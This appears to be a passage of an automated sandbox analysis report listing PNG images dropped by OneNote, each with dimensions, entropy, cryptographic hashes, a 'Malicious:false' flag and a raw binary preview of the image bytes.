                                                                                                                                                                                                                  File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):8184
                                                                                                                                                                                                                  Entropy (8bit):7.807848176906598
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:ExqMHYnnEnntvA4Mesu3SXHycmfIEFQp1r/:E0MGEn29esuiXHt0FQp1
                                                                                                                                                                                                                  MD5:5B386BF9A20766956A84F67F913F23D7
                                                                                                                                                                                                                  SHA1:6E72E51F5B4FA64E52D2B80B41409B3DB927A3C7
                                                                                                                                                                                                                  SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                                  SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............s>.Q....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]...!.......!.YTP.A......-..r..$.E.J.I;....T.M.UE[..Q..x....wKB=.m...4.%..|:...9...\{..o.3..g.o~..~s...k...X.r....... ..@Gggg.?.... P_.]]]..*Iu....C...h..$...:... ..... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A...@R.. ....#...C.#.@..H*... ..`...`(q...@.I..... ......%. ... .\.......@R..... ..$.k....@0.Hj0.8... ..r.@....F.I...G.....T...@.... ..P........5...@ ..$5.J.A..............W_...1c.l..6..`...@ ..I.S..I.I'...5.\..;....'1. ...........c..k.u.Qs..}..g#b.j.@..Y..QR...n.!...-......h..Z.......Xw.U.~q... ..@.%.'............. P..E.T.b.:j.(F..p.... .C.}3.'.|..z..w.a.....\{.:.4[.lY..~...x..'/....g....J..9.K_...'...:..;)......SO=u..E... Py.qf..}O7.o....u?:....6~~..9...?7.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11886
                                                                                                                                                                                                                  Entropy (8bit):7.946442244439929
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                                  MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                                  SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                                  SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                                  SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..x.U..I...JB..;H..."..(U.EE\\..._v]W..b...Az..{G:J..B.$...H.IHB.o2xE..3gf..w..2....w..s|.....C.$@.$.....t.!........8......RR....<...6..P||....$@.$@...PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.z*.#........1@.$@.b.PO.p... ....2.H..H@......B.$@..S.......!@=..VH..H.z.. .. .1...b8......PO..$@.$ ...T.GZ!.. ..)c..H........H+$@.$@=e.........S1.i..H....... ...C.'++kH.G.=Z!.U...73o^.IH..O|jrj.D.......I.M.........Kph.............R.x.......RU8_".......j.......B"O.z.|.9.."..L....Y.d.Rej.-Y.dhX....:.xH.z.!(>&..4.....O.<..T\.%a..e...*..UnR....+j...2.."..M.O>.z......T...].j....m...S.`..&..)....f..2..............+..SP..?.a...=.....3......K.zj.5.fP.......2:..?.....%....d.qxC..W.~.._....!.W..6....iJ)*.(..wg.}.]sw\.r]...r"...e_-....5_9.YN'...PO-.d.:.%..wZQ...H...JMJ.6c....|g*..,.3.....T...o..Nyc.W.....A.3.._...U%...PG.z.....&.%.v....AIm.....~.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):14458
                                                                                                                                                                                                                  Entropy (8bit):7.944094738048628
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:uuT43eqJy2jEeSZE0onrAFAOpn5ytFfNrfIkBQTYz8ynth2EB:EugQeS+nrAFZ8tJNrfRQM4ynH2EB
                                                                                                                                                                                                                  MD5:7CEB71F78A193F8C9F7FFDA5F81AEBD8
                                                                                                                                                                                                                  SHA1:EEC1597705EFF1A527C246B86A71878185BA6B1B
                                                                                                                                                                                                                  SHA-256:77911FF7AEAB8FCCAF36DE6E1183FFE1A6C27F77B5714EE780976CE5189E8FD0
                                                                                                                                                                                                                  SHA-512:1D1AB19B64E1E2ABCA61AE78B3B50310B0A6CF19D2ECFCB4499D8D0BF68600B4D95BC0945EF9FF9B1D016ED61EAC518DCCA1A426F460317C07AD51E2E047948C
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR...3............>....sRGB.........gAMA......a.....pHYs..........o.d..8.IDATx^.}.p\W.ZRKjI.}..[..M.l.N..[..O..B&....?5...@.5.5EQ...T...d*U..*.C6....8..}.Wy.e........k]s..z..^...T....s...}:.{..n..1.."@....P......."@....p @f.s@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....6D...."@f.3@.... ..B....5 ...f.;.0..7141...L.....M.3.L....{M.T...I.C...@E{.w.Y...q.....c3..gf.3..'j...I...{M..@..4555==-...!..f.....d...>i.%&&&%.u....f..[......O`.......G..E6I.< ..3.k...',....Y...<..........u...{9.......S^^.q.<..^....2.bb.E`r...ey........ ..3........Dg@L..a'.x&''.O.Y..!e.c%$..(P__.d.....Sj..S...BLu.[g..mK.SwVe.."@.T.@P.y.........=....40..L...$d..J....cccw...^.RBKKK...heJiS3.0I.X<..}..*O..........QR..q.5GTA..ht.(^.Hno..n.......wvv:..K?.\.JQ/i..h0)G..1Y....K.>FT...8..d&..,+-.T.b.........f.."3.V 6.:...E 1...?.Q.6....A1Smm..K...V}...:.uA'.$.v.cy..<.`.Z322.r.LI.....>......&........"..."......@.Ccccee.[..z{..fL5..{...
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):11332
                                                                                                                                                                                                                  Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                                  MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                                  SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                                  SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                                  SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR................R....sRGB.........gAMA......a.....pHYs..........o.d..+.IDATx^.{...u./-...&....6..+z..Q."b*. &M.d-e.*.. ....J..Z-T.Z$....R..F...%*`bn..<.....W.E ..w....^...;g..[w.5w.9g...3......t8t.P.?$@.$@.5...=.8qb.... ...5...a=...#.y. ...@B.....am. .. .......$@.$`.....G.B.$@..S... ...C.zj.#[!.. ..).......!@=..........}..H.........VH..H.z.>@.$@.v.PO.pd+$@.$@=e. .. .;...v8... ...................f.o_o{....~t...n.S.N..?..._..L;J.H ..,....7.}...|....7...b...|.........ObVa1. .?.X.....~.....t2..V>.b.}..0.F....%`GO7.n#~..F....K.~...FX..H.^....k.Z/.2v.W..M.<.;$...v.t..,UO.-]............D.....o.J..Y........5.%.l....{.....'O..dC$....=uks..;{x.,.N.=.."..Q]..w>.E.H........AV=...f.&. ..ip}._0.~[pf.`..9..v.W.,..2.E.$P........+...OcC.H..=..|..[..g%(h.....W...?...UDh..T$..?....|.]..)?[Wo.h.'..2P.1..!.......$.NO.5..}...c.;...~.x,|Q....B..6.@>..y..}...m...D~z....L#.0`_.`.s?|....I.....a...=N....c.._.2.._..6 .]...5....{.^>.lM..;n...k..9J..S.G..{.
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):22634
                                                                                                                                                                                                                  Entropy (8bit):7.974332204835705
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                                  MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                                  SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                                  SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                                  SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............._......sRGB.........gAMA......a.....pHYs..........o.d..W.IDATx^..i.=YY6z@..DP.i.IAA........l.Dd0"p0.ON.~....s>.?zbH8..%$`....b7..=....25*.".L. ..u_..f...j.........Uk..^UW]...u..}.{.]t.-.(...J......e...t.....@i.k......_.(.....@...Z.6J......2.O.-P....._.u.=T..4p...e..q..5^f~....@i`....?.....@i..k.........?...u..O|bN.~?MbT%...@.LO.Or.`....$..y.{..o....~..(.;......SNi...6....w....~.{..^w......~.S...g?../|.O........7_...Oj....|......40......9....?..<.3nw...x...g...7.....(<.d...(3.K...;....\..:...'.5.....&...>...t.;....8..SO;../...._.}.{..D.jt.......jc...s..........Z...0q...@......Z]S.(..o.....Og.u.l.i.-.9..)j..~...5.l}..........G......k....Z..c.....}.c.?.\....t+u...15p.....[|......2..;..;...........w...........v.7...I.-w...K/.J...[..N.....W..U#...._.j(...//z.|..kv....];j|../m....t.9.;-0.:.4p..@K.....~.9.$qu.E....!.9|.m.+`).|......x..vak-].../.....G'....4.>B6$.......-o.q..L;*.N+....>...=.!.Y..Q...?......7..,....}
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 220 x 170, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):7374
                                                                                                                                                                                                                  Entropy (8bit):7.955141875077912
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:192:IfGsPejaVZWzIZKpnFFt0HK5+2Y/SLopWR:IusPe278IZKpnzt0q5+qVR
                                                                                                                                                                                                                  MD5:70DAF02EC717AB54452FA4C707BCAC74
                                                                                                                                                                                                                  SHA1:30F46FAC5E96470848C5A948162CC12455A05154
                                                                                                                                                                                                                  SHA-256:58469BA93EA36498FF9864EB54713A001C52106DE97804506D82EE24B816712B
                                                                                                                                                                                                                  SHA-512:E599FDC22A32CFEDBB23EECEAE0B278EAB9A90959FE6ACB40E2B201E45A7C19261AAF529E7A0D9CAF2A9A4C64C7831343F3BC20810513990AD5D38A32741564F
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............IC......sRGB.........gAMA......a.....pHYs..........o.d...cIDATx^..S[Y..I...B..`...N....t.q..j...+LU.....O..sF.!.I...w@..H.Q.w. ...s..{B.....2......i..q..z{.}^..............J.fQ.....r.\WWw.T....amt.t;...6\N.........z.n...].u.z..Q...?^........;;;;:NO.}.c....<-...........({.^....t.k...F..[m..:........R2...%.y.l^OOONN8)....\y....}...}}.}.Hy6.^.a.....\...!S....K..|>......s.........l..P...LFWW.l..RK..b.h.h .3.F..|.|..~..........e.aa.........0H...<.Y.a`..xA!...7.X....xd=........h?o5........Ay....?6...........*..tb.9.*j...S`](.,P...9.2j..?...z3wD.[......L3.Ng2G|.......&..0ZK1u8.H.2...Z../..P(....BA..aL|..a.Y:.....J...5^x..'.\..&S...L..U..;....<{..."..@x ....J.N...;....WIht.<..B......!HM...&z&..6u..hF..G.D..B..........A.....n...GG...,.,.Q....X,`"....r.........3d.{o.(/...3.H...x:sX....h.8... ....r <..DB. ...y.N...o....5.......L&w....v....w..D......!.a4...."8.U.|.0m.(..zR>..=.+.L.....e....Yd2.-Z.7..D"..pX.I.....e5qYa._&..3..J..++
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 167 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):5386
                                                                                                                                                                                                                  Entropy (8bit):7.943706538857394
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:96:x4F84/zVJWedudPZZRdbvczHe2ftFJ0y8Ea5b2AELJj:x4FTnodRZ7c7LrabEaMAGp
                                                                                                                                                                                                                  MD5:DB48555480A383CD1D4DD00E2BCFCF29
                                                                                                                                                                                                                  SHA1:8060B6FE12175289F0A71F45B894030A0D9F1AB5
                                                                                                                                                                                                                  SHA-256:807723D8F90A5BD41269A7A62817547026A117D666D5BEF454EB699C97CA3FA2
                                                                                                                                                                                                                  SHA-512:2614C04686299CEE8D56577A1E836A26076D42E041C627177FDB295629F6A80190910947FA794A094C55A45C3D70725EEF29097118E523A38B50C9263C771A41
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.............gI......sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..xTU..M..B...P........)vQpQ.ED.""......,."....*bC..VT.. M!...@z....1...Wf.w..o29...=.v.TUU..^..@....S..<..;h...5.9r....x..7N{...=........'...N...u...9..5+YW.;..N\..u...9..5.....O....,.K..'.../.....1..T....>.f..9.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo...u.xo........'L...g.UVVz.[.n)...Yqq...Y.f.)//_.l.W_}.,........S^Z^Y..++.*..pF.....?...I.&...O,.k.d...~..w;Q........7}1y......e_............=y._U....{..}.w.O..~.z.{........W\q.."........^.h........}p.+.>m...d...4...`a~Z^....me......:N]..1...g..y.f.......l..g.).......e[........Z..RB.KrJ.....#...{..eff..v.[[<.n..?{.....SN9%...V.yE...s2..........e@Wz..I...B.r..<.-.=/t{.v.|..J....,.@.A.v...s`/.....6f....L?.z[T7..)S0.;c....\s..z-C.....v..}Y..{..j..xF.....'.#_..C....k|3..8...N...5......f....3......f)-.p..%.D.v.v.].f.......33<<......[bbbt.]w...:.r.....z....q..=....m.uhD..,..zXg
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1604
                                                                                                                                                                                                                  Entropy (8bit):7.814570704154439
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                                  MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                                  SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                                  SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                                  SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.......1.....*[......sRGB.........gAMA......a.....pHYs..........o.d....IDATXG.iLTW... .23..,..6 ........kK.5...5..IMh..Tl......V.v.PZ.-F...".k.pCQ......#.../s>f..3s....<...=^'/.~.;.a....{>.g.....*o..6k..k....E....O....aQ.j....X&vG......{u-....$...CX.....xhZ...Q...Z.........O...I..Id.h.....q..q.........Y..J7O7.R...~o...[....;.'n...u.g..>X....o.]}...>...._..u......5...2].......EodZ.R.i....=ryxh...C!..6$!..)..W,^...Q.y...Ay[...M'o...;..hh'....}.%...."..h.5.?=.y.x..2/gK...4.2P.(#S.F.G.o...!Mk...w/._1`.5....[U7.0..Z..w^..&/...G...Y...g..;...JF.t..,.~.'.X...uYd.E...+R....:2cHG9..YC..X..Eg.).r..+%%.t..6/...@....3....|.O|.0.:.l.;........_.....E.J"..:)..#R"..q....~r..-..%.4....b..Q....al..6......{.y...I1.Xs.}..y.;...u.\......sm.C..@ 2.AG.K..5..}.k ..~........4..<..PH|.).Z.[H.G.iH.7UR.`..B.f......<.5n7.*WR.c....I1.......<y.%...-..."Y@.*...)).(...I...y.z6...J2.s...c...z.G..Kj..^R...M..k>.PA.1>.s<.G...8.r.....dL..uF.(...q.P.j@...CPSc..^
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 651 x 254, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):19235
                                                                                                                                                                                                                  Entropy (8bit):7.944867159042578
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:384:h4iuxL3Yck5lpMcTyHOypEod/G38lJxqSp5BCU:h4/xjYc2lmcOuuEoJM8fse5BCU
                                                                                                                                                                                                                  MD5:AE32E846559D576FD263BD69FEDBEC28
                                                                                                                                                                                                                  SHA1:D481DF71C858BAECFE33418002D368F2DCF68D4A
                                                                                                                                                                                                                  SHA-256:6E21222B0EADAB8D3CFB0C7D14941D196165D6709271AF317D099F12403CD352
                                                                                                                                                                                                                  SHA-512:9AA4A6DD01D3B745D674721765F2BFCCAB584CA0603F222EDBE9A88190A2A57438041E7A3706CC0656A6ABB79AA18118319F210EFFE3DD917E7B94A6294BD346
                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                  Preview:.PNG........IHDR.....................sRGB.........gAMA......a.....pHYs..........o.d..J.IDATx^...X.W....D..A......bW.A..[..5.F..D...7.ob71.....b.."...("...(...{/...e......}.....;...S.X...H...@d...... &.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..... F.....b..O.KVfVfjFzJzVF.}i{.R..l..q..`I....e.'./.'.G.z.*!&>)61.UjVzf..4>Q~...U..=......s.\..WE...2...t..`F....M....'..?.......>BO(m.V.P....Gy.../........B.6.......=|z7.Z.|hQ..u..j............&..Z.bo?.u...S7.G>......]I..7.i...3....<.y.l]....SI>...L.2..<.....[.'=M.Tsprp...T....cE'*..P........eefQ.NKN.x....:-#5#....q/..xq.YzJ:.T.*u.j..S.C=...|.....2..(YF........|...*.7t...{.jz....W..Y..{...nlfj...L.6.[.hS.=.....(!C.......?5..+...[..a.:U.K..C.......w......+..r@.z.7..j..qB..B.....X}..=.fk...>^5[....n.z....wn....Z4.._iWG.^..z6./]t......dhM.9s...Gbo?...U.V..tj.......*&)Io.{q.G...A...l...i7...&....d.E]....#.W.x,.T...&Mz4+].4.$n..F..x...<.ppr.............y.,i./..
                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                                  File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                  Size (bytes):1570
                                                                                                                                                                                                                  Entropy (8bit):7.780157858994452
                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                  SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                                  MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                                  SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                                  SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                                  SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                                  Malicious:false
